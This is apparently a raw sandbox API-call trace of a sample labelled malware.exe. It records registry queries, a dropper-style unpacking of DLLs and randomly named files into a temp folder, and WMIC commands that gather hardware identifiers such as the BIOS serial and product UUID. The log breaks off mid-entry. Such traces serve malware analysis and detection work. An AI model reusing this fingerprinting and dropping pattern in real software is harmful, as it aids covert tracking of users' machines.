3240 malware.exe
#281840000
LoadLibrary
lpFileName=C:\WINDOWS\system32\IMM32.DLL
Return=76390000
#282630000
LoadLibrary
lpFileName=gdi32.dll
Return=77f10000
#282300000
LoadLibrary
lpFileName=LPK.DLL
Return=629c0000
#282840000
CreateFile
hName=C:\WINDOWS\WindowsShell.Manifest
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=44
#283090000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\SmoothScroll
Return=2
#283100000
RegQueryValue
hKey=HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\EnableBalloonTips
Return=2
#283110000
RegEnumValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\LanguagePack\SURR
Return=0
type=REG_DWORD
data=2
#283370000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CriticalSectionTimeout
Return=0
#283370000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Ole\RWLockResourceTimeOut
Return=2
#283440000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
Return=0
#283690000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#283750000
LoadLibrary
lpFileName=comctl32.dll
Return=773d0000
#284390000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ThemeManager\Compositing
Return=2
#284410000
RegQueryValue
hKey=HKEY_CURRENT_USER\Control Panel\Desktop\LameButtonText
Return=2
#284420000
LoadLibrary
lpFileName=uxtheme.dll
Return=5ad70000
#286030000
LoadLibrary
lpFileName=SHFOLDER
Return=76780000
#286250000
LoadLibrary
lpFileName=ole32.dll
Return=774e0000
#286300000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood
Return=2
#286320000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
Return=2
#286330000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
Return=2
#286440000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
Return=2
#286490000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Return=2
#286510000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
Return=2
#286550000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Return=0
#286930000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
Return=0
#286940000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\System\WPA\PnP\seed
Return=0
#286950000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\OsLoaderPath
Return=0
#286950000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\OsLoaderPath
Return=0
#286950000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
Return=0
#286950000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemPartition
Return=0
#286980000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
Return=0
#286980000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
Return=0
#286990000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackSourcePath
Return=0
#286990000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackSourcePath
Return=0
#286990000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\ServicePackCachePath
Return=2
#286990000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\DriverCachePath
Return=0
#287000000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\DriverCachePath
Return=0
#287010000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath
Return=0
#287030000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\LogLevel
Return=2
#287040000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\LogPath
Return=2
#286640000
LoadLibrary
lpFileName=SETUPAPI.dll
Return=77920000
#287180000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\MaxRpcSize
Return=2
#287240000
LoadLibrary
lpFileName=rpcrt4.dll
Return=77e70000
#287350000
CreateFile
hName=\\.\PIPE\lsarpc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=98
#287450000
CreateFile
hName=\\.\PIPE\lsarpc
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=94
#287650000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#287680000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4774220e-1640-11e4-bb1b-806d6172696f}\\Data
Return=0
#287680000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{4774220e-1640-11e4-bb1b-806d6172696f}\\Generation
Return=0
#287720000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#287740000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Data
Return=0
#287750000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#287770000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#287780000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#287800000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6fc0686a-6791-11e1-b81a-806d6172696f}\
Return=0
#287800000
RegSetValue
hKey=9c\BaseClass
type=REG_SZ
data=Drive
Return=0
#287800000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#287810000
CreateFile
hName=\\.\MountPointManager
desiredAccess=
creationDisposition=OPEN_EXISTING
Return=9c
#287830000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4774220e-1640-11e4-bb1b-806d6172696f}\
Return=0
#287830000
RegSetValue
hKey=9c\BaseClass
type=REG_SZ
data=Drive
Return=0
#287840000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#287880000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
Return=0
#287950000
LoadLibrary
lpFileName=SHELL32.dll
Return=7c9c0000
#287960000
LoadLibrary
lpFileName=ole32.dll
Return=774e0000
#288030000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
Return=2
#288040000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
Return=0
#288040000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
Return=0
#288060000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
Return=2
#288070000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
Return=2
#288100000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
Return=2
#288110000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
Return=2
#288130000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
Return=2
#288140000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
Return=2
#288160000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
Return=2
#288170000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
Return=0
#288170000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
Return=0
#288170000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
Return=0
#288170000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
Return=0
#288180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
Return=0
#288180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
Return=0
#288180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
Return=0
#288180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
Return=0
#288180000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
Return=0
#288190000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
Return=2
#288190000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
Return=0
#288190000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
Return=2
#288220000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\DocObject
Return=2
#288230000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\BrowseInPlace
Return=2
#288280000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\IsShortcut
Return=2
#288290000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\AlwaysShowExt
Return=0
#288300000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\NeverShowExt
Return=2
#288480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsm1.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=a8
#288500000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsm1.tmp
Return=1
#288500000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsm1.tmp
Return=1
#288530000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=a8
#288530000
CreateFile
hName=C:\Documents and Settings\All Users\Desktop\malware.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=a8
#294880000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir
Return=0
#294980000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=9c
#295040000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp
Return=1
#295040000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp
Return=1
#295410000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=c
#295410000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=c
#297770000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#297770000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298040000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298040000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298270000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298270000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298720000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298720000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298990000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#298990000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299220000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299220000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299720000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299720000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299940000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#299940000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#300160000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#300160000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\System.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#300430000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#300430000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#301820000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=c
#301840000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#301840000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp
Return=1
#301880000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#301880000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#303370000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
Return=0
#303410000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#302020000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp" WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
Return=1
#302010000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp" WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
Return=1
#302010000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp" WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
Return=1
#311130000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp
Return=1
#311130000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns3.tmp
Return=1
#311920000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#311920000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#312390000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=b4
#312410000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=b4
#312410000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp
Return=1
#312470000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#312470000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#313450000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#312600000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp" WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
Return=1
#312590000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp" WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
Return=1
#312590000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp" WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
Return=1
#316840000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp
Return=1
#316840000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns4.tmp
Return=1
#317260000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#317260000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#317720000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=c
#317750000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#317750000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp
Return=1
#317790000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#317790000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#318930000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#317980000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp" WMIC bios Get Version /FORMAT:textvaluelist.xsl
Return=1
#317980000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp" WMIC bios Get Version /FORMAT:textvaluelist.xsl
Return=1
#317980000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp" WMIC bios Get Version /FORMAT:textvaluelist.xsl
Return=1
#322160000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp
Return=1
#322160000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns5.tmp
Return=1
#322570000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#322570000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#323020000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=b4
#323040000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=b4
#323040000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp
Return=1
#323080000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#323080000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=b0
#324050000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#323210000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp" WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
Return=1
#323210000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp" WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
Return=1
#323210000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp" WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
Return=1
#327960000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp
Return=1
#327960000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\ns6.tmp
Return=1
#328560000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#328560000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\lzma.exe
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#336390000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\kch802eygvb
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#336390000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\kch802eygvb
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#336480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\q9t52c76ajvkcycyvm
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#336480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\q9t52c76ajvkcycyvm
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#336620000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\DcryptDll.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#336620000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\DcryptDll.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ac
#338510000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\kch802eygvb
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#338510000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\kch802eygvb
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#338540000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nsx2.tmp\q9t52c76ajvkcycyvm
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#338540000
CreateFile
